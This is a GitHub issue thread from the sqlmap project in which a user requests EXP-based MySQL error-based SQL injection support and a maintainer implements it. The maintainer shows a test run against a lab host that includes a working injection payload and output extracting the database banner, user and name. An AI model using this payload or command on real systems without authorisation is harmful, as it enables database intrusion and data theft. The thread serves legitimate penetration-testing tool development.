Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

add EXP support in error based #1363

Closed
shadowzoom opened this issue Aug 27, 2015 · 4 comments
Closed

add EXP support in error based #1363

shadowzoom opened this issue Aug 27, 2015 · 4 comments
Assignees
@stamparm
Labels
detection enhancement normal
Milestone
1.0

Comments

@shadowzoom
Copy link

Can we get support exp queries in error base? :)

https://osandamalith.wordpress.com/2015/07/15/error-based-sql-injection-using-exp/
https://www.exploit-db.com/docs/37953.pdf
@stamparm
Copy link
Member

No problem, but there are already lots of other error-payloads. This one will/would go under way higher --level (e.g. --level=3)

@stamparm stamparm self-assigned this Aug 27, 2015
@stamparm stamparm added this to the 1.0 milestone Aug 27, 2015
stamparm added a commit that referenced this issue Aug 28, 2015
@stamparm
Implements #1363
61b33f2
@stamparm
Copy link
Member 

$ python sqlmap.py -u "http://192.168.5.40/mysql_getint.php?id=1" -z "flu,bat,tec=E" --test-filter "exp" --banner --current-db --current-user
         _
 ___ ___| |_____ ___ ___  {1.0-dev-ee22c47}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 10:59:52

[10:59:52] [INFO] flushing session file
[10:59:52] [INFO] testing connection to the target URL
[10:59:52] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[10:59:52] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to XSS attacks
[10:59:52] [INFO] testing for SQL injection on GET parameter 'id'
[10:59:52] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[10:59:52] [INFO] GET parameter 'id' is 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)' injectable 
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 3 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)
    Payload: id=1 AND EXP(~(SELECT * FROM (SELECT CONCAT(0x716a706b71,(SELECT (ELT(7583=7583,1))),0x7176787071,0x78))x))
---
[10:59:52] [INFO] testing MySQL
[10:59:52] [INFO] confirming MySQL
[10:59:52] [INFO] the back-end DBMS is MySQL
[10:59:52] [INFO] fetching banner
[10:59:52] [INFO] retrieved: 5.6.26
web application technology: PHP 5.5.28, Apache
back-end DBMS: MySQL >= 5.0.0
banner:    '5.6.26'
[10:59:52] [INFO] fetching current user
[10:59:52] [INFO] retrieved: root@localhost
current user:    'root@localhost'
[10:59:52] [INFO] fetching current database
[10:59:52] [INFO] retrieved: testdb
current database:    'testdb'
[10:59:52] [INFO] fetched data logged to text files under '/home/stamparm/.sqlmap/output/192.168.5.40'

[*] shutting down at 10:59:52

@stamparm
Copy link
Member

p.s. it is being used when --level >= 4

stamparm added a commit that referenced this issue Aug 28, 2015
@stamparm
Minor patch for #1363
ee22c47
@OsandaMalith
Copy link

nice ;)

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@stamparm stamparm

Labels
detection enhancement normal
Projects
None yet
Milestone
1.0
Development

No branches or pull requests
3 participants
@stamparm @shadowzoom @OsandaMalith